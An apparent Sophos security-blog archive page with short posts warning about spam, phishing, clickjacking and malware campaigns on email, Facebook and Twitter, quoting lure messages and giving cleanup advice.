Spam

Chess CAPTCHA – a serious defence against spammers?

Posted on


CAPTCHAs – the questions that a website asks you to answer to prove if you’re a human being or not – come in many shapes and forms.

Conventional CAPTCHA

Although they most commonly ask you to decipher some words hidden in a distorted graphic, there are more elaborate versions which can ask you tosolve some complicated mathematical calculation or ask you to add toppings to a pizza in an attempt to stop automated bots leaving spammy messages.

As a keen chess player, I was interested to see this CAPTCHA being used on an online chess forum:

Chess CAPTCHA

Okay, so it’s not much of a challenge if you’re a chess player, but it also clearly locks out any users who do not know how to play chess. (For those of you can’t see the checkmate, the answer is upside-down at the bottom of this article – and make sure to realise that Black is playing from the bottom)

But most importantly, if a CAPTCHA system like this were to become widely-used, how tricky would it be for an automated bot to solve the puzzle?MORE

IMG0893.zip – Your photo all over Facebook? Naked? Malware campaign spammed out

Posted on Updated on


SophosLabs is intercepting a spammed-out malware campaign, pretending to be an email about a revealing photo posted online of the recipient.

The emails, which have a variety of subject lines and message bodies, arrive with an attached ZIP file (IMG0893.zip) which contains a Trojan horse.

Malicious email

Subject lines used in the spammed-out malware campaign include:

  • RE:Check the attachment you have to react somehow to this picture
  • FW:Check the attachment you have to react somehow to this picture
  • RE:You HAVE to check this photo in attachment man
  • RE:They killed your privacy man your photo is all over facebook! NAKED!
  • RE:Why did you put this photo online?

Subject lines used in the spammed-out malware campaign

The message bodies contained inside the email can also vary. Here are some examples:

    • Hi there ,
      I got to show you this picture in attachment. I can't tell who gave it to me sorry but this chick looks a lot like your ex-gf. But who's that dude??.
  • Hi there ,
    I have a question- have you seen this picture of yours in attachment?? Three facebook friends sent it to me today... why did you put it online? wouldn't it harm your job? what if parents see it? you must be way cooler than i thought about you man :)))).
  • Excuse me,
    But i really need to ask you - is it you at this picture in attachment? I can't tell you where I got this picture it doesn't actually matter... The question is is it really you???.MORE

600,000+ compromised account logins every day on Facebook, official figures reveal

Posted on


If you’ve an unauthorised party has logged into your Facebook account, then you’re far from alone.

New official statistics revealed by the social networking giant reveal that 0.06% of the more than billion logins that they have each day are compromised.

Put another way, that’s more than 600,000 per day – or, if you really like to make your mind melt, one every 14 milliseconds.

Snippet of Facebook security infographic

The statistic was revealed in an infographic published alongside an official Facebook blog post trumpeting new security features introduced by the firm.

The new security features include Trusted friends (called “Guardian angels” in the infographic). Read the rest of this entry »

Horrible blog going around about you? Or a Twitter phishing attack?

Posted on


Malicious Twitter

You may not realise it, but your Twitter account is worth money.

Cybercriminals are keen to compromise your Twitter account, so they can spam out messages (either as public tweets, or less obvious direct messages to your online friends) in the hope that some recipients will click on the links.

What lies at the end of the links can vary. It might be a webpage offering you a new wonder diet, or a pornographic website, or a link to a download designed to infect your computer.

But first they need to commandeer your Twitter account, and the simplest way for them to do this is just to ask you for your Twitter username and password.

Here’s an example of the latest attack that has been seen on Twitter. The message arrives in the form of a direct message (DM), and has a pretty enticing reason for you to click on the link: more

Google’s Picasa and Yahoo! Groups used to spread spam

Posted on


No spam mailbox

One of the most effective techniques anti-spam products have to block spam messages from reaching your inbox is reputation filtering.

Yes, to a degree, anti-spam solutions may still look for v1@gr@and Mrs. Gaddafi offering you $40 million, but the biggest bang for your buck comes from reputation.

What do you do if you are a spammer? Figure out a way to get a legitimate mail provider to deliver your messages for you…MORE

Hurricane Irene clickjacking scam on Facebook

Posted on


Hurricane Irene

States in the USA, such as Vermont and New Jersey, are continuing to deal with heavy flooding in the aftermath of Hurricane Irene.

And we weren’t surprised to find internet scammers attempting to profit from other people’s misery.

For instance, here is a clickjacking scam which at the time of writing is still active on Facebook.

Hurricane Irene Facebook clickjacking scam

This Facebook page reads:

VIDEO SHOCK - Hurricane Irene New York kills All

All? Hmm.. that would be a rather fanciful claim even for the most sensationalist tabloid report. But maybe it will be enough to make you click further.

Hurricane Irene Facebook clickjacking scam

BAM! Too late. You’ve been clickjacked. Even before you’ve had a chance to notice that the page is suddenly talking to you in Italian, the webpage has taken your click onto what you thought was the video’s play button and secretly behind-the-scenes tricked you into saying you “Like” the page – thus promoting it to your online Facebook friends.

If you were running an add-on like NoScript for Firefox you would have been protected by a warning message:

Hurricane Irene Facebook clickjacking scam intercepted by NoScript

But let’s imagine that you weren’t protected. What happens next?

Hurricane Irene Facebook clickjacking scam

The page insists that you share the link to the Facebook page, presumably in an attempt to increase its viral spread. So far things don’t seem to be working well for the scammers – as only 12 people have said they “Like” the page (and one of those is my test account). Maybe folks are suspicious about a claim that Hurricane Irene has killed *everyone* in New York.

Hurricane Irene Facebook clickjacking scam

You’re still keen to watch the video, of course, but first the scammers want you to take an online survey – which not only asks you for personal information but also can earn them commission.

If you are hit by a scam like this you should remove the page from the list of pages that your Facebook profile likes..

Unlike Hurricane Irene Facebook clickjacking scam

..and remove it from your newsfeed, reporting it as spam to Facebook.

Remove Hurricane Irene Facebook clickjacking scam

The good news is that this particular scam hasn’t become widespread, but many others do.

If you’re a Facebook user and want to keep up on the latest threats and security news I would recommend you join the Sophos Facebook page - where more than 100,000 people regularly discuss the latest attacks.

UK student loans targeted by phishers in latest spam campaign

Posted on


With British students about to start another year at university, the last thing they probably want to hear is that there is a problem with a student loan.

But that’s precisely the camouflage that online scammers are using to steal personal information today.

An email, claiming to come from Directgov UK, tells students that there is a problem with the online account for their student loan, and they need to update their account urgently.

Here’s a typical spammed-out message we’ve seen in our traps:

Student loan phishing attack

Subject:

Student Loan Update.

Message body:

Dear Student Finance Customer.

We at HM Government noticed your Student loan online log in details is incorrect and need to be updated.

DOWNLOAD THE ATTACHMENT TO UPDATE YOUR ACCOUNT NOW

Regards
Inline Verification. Directgov UK.

Attached file:

Student Loan Update.html

Clicking on the HTML attachment is not a good idea, however, as it will urge you to enter your details which are then sent via a website to the phishers.

Student loan phishing attack

Sophos products block the message as spam, and block the webpage that the HTML form is attempting to post the personal information.

Remember to always be suspicious of unsolicited attachments. Also, I would hope that a good student would have noticed the grammatical mistake in the phisher’s email..

Pictures of Osama Bin Laden phishing attack hits Twitter users

Posted on


Phishers are once again on the prowl for unsuspecting Twitter users, tempting their prey with the promise of pictures of Osama Bin Laden.

Pictures of Osama Bin Laden

Pictures of Osama Bin Laden [LINK]

Some of the accounts had earlier posted a similar message (complete with some rather sloppy spelling):

Pics of Osama Bin Laden Are Finally Released! [LINK] ::wanring very gorry::

Clicking on the links takes you to what appears to be the normal Twitter login page.

Fake Twitter login page

Would you enter your username and password at this point?

Take a close look at the URL before you make that decision.

Pictures of Osama Bin Laden phishing url

Hopefully you notice that it’s not the real Twitter URL – it’s a phishing site set up to steal your username and password.

If you make the mistake of entering your username and password then you will handing over the keys to your account to phishers, who would then be able to use your account to read your private messages, send messages (perhaps spam-related or containing malicious links) to your followers.

Worst of all, if you’re one of those people who uses the same password as you use elsewhere on the internet – you’ve now told the cybercriminals how to access, for example, your Gmail, Hotmail or PayPal accounts as well.

If you found your Twitter account was one of those sending out the phishing messages, or if you made the mistake of entering your username and password, then you must change your password as soon as possible.

Not just on Twitter, but also make sure you’re not using the same password anywhere else on the net. You have to consider that password is now compromised.

There’s some other house-cleaning you should do on your Twitter account too. Visit the Applications tab in “Account Settings”, and revoke access for any third-party application that you don’t recognise.

Your Facebook Profile Stalkers exposed? No, it’s a rogue application spreading virally

Posted on


Messages are spreading rapidly on Facebook claiming to reveal a way to find out who has been secretly viewing your profile.

Here are a couple of examples:

Profile stalkers on Facebook

Brilliant!! Now u can see all your profile stalkers! --> [LINK]

and

Profile stalkers on Facebook

WOW!! I can't believe that you can see whose viewing your profile. I've just seen my top 10 profile peekers and I'm shocked on whose Viewing my Profile. You can also see whose viewing your FACEBOOK PROFILE HERE: [LINK]

Clicking on the links takes you to a splash screen for a rogue application, and you are fooled by the promise of discovering who has been viewing your Facebook profile to give permission for a third-party application to access your account.

Profile stalkers on Facebook

Want to see who views your Facebook profile?

This is amazing!

Now you can see who is viewing your profile and find out how many profile views you got. Just use our application and press button below and then Allow to analyze your Facebook profile!

Obviously you shouldn’t grant permission on the following screen for the application to access your Facebook profile, but an alarming number of users appear to have no qualms about exposing their confidential information and degrading their security in this way.

Profile stalkers on Facebook

The problem is that this isn’t a legitimate application request. A rogue application wants access to your account so it can spread the messages and its link even further, spreading the campaign virally across the social network. The goal? To earn money by driving traffic to an online survey.

Profile stalkers on Facebook

Notice that the survey presents itself in a convincing Facebook style, which may trick some users into believing that it is legitimate.

If you’ve been affected by this scam, you should clean up your account before any further damage is done.

I’ve made a YouTube video where I show you how to clean-up your Facebook account if you were hit by this, or similar scams on Facebook:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you stay informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos Facebook page, where more than 100,000 people regularly share information on threats and discuss the latest security news.

You could also do a lot worse than check out our best practices for better privacy and security on Facebook guide.